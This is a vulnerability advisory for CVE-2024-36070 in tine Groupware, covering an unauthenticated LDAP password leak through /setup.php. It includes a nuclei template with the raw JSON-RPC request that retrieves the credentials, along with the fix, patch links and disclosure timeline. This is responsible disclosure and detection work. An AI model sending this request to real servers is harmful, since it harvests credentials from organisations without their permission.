usd-2024-0002 | Password Leakage in tine 2023.11.2
Product: tine Groupware
Affected Version: prior to 2023.11.8
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Security Risk: High
Vendor: Tine Groupware
Vendor URL: https://www.tine-groupware.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-36070
CVE Link: https://nvd.nist.gov/vuln/detail/cve-2024-36070
Description
Tine Groupware is an open-source web application designed to enhance collaboration and productivity in a team or organization. It offers a wide range of features such as email, calendar, address book, task management, and file sharing.
If the application was configured to use LDAP backend, the credentials are leaked to unauthorized users.
Proof of Concept
The /setup.php endpoint leaks the LDAP password using the Setup.getAllRegistryData method.
An example nuclei template was created to check for the unauthorized access to the method:
id: tine20-unauth-ldap-password-leak
info:
name: Unauthenticated LDAP password leak
author: ChristianPoeschl
severity: high
description: tine leaks LDAP password to unauthenticated users
http:
- raw:
- |
POST setup.php HTTP/1.1
Host: {{Hostname}}
X-Tine20-Request-Type: JSON
{"jsonrpc":"2.0","method":"Setup.getAllRegistryData","params":{},"id":2}
matchers:
- type: word
condition: and
words:
- authenticationData
- configExists
- '"backend":"Ldap"'
Fix
Ensure proper access control.
Users of Tine Groupware should update to a current, patched version.
References
- https://www.tine-groupware.de/
- https://github.com/tine-groupware/tine/releases/tag/2023.11.8
- https://github.com/tine-groupware/tine/commit/5d556a1225aa358cbf7cfbeae518c9386b46f516
Timeline
- 2022-04-04: First contact request via info@metaways.de
- 2024-04-09: Vulnerability is fixed by the vendor, a patched release is planned.
- 2024-04-11: A patched release is made available on GitHub.
Credits
This security vulnerability was identified by Christian Pöschl of usd AG.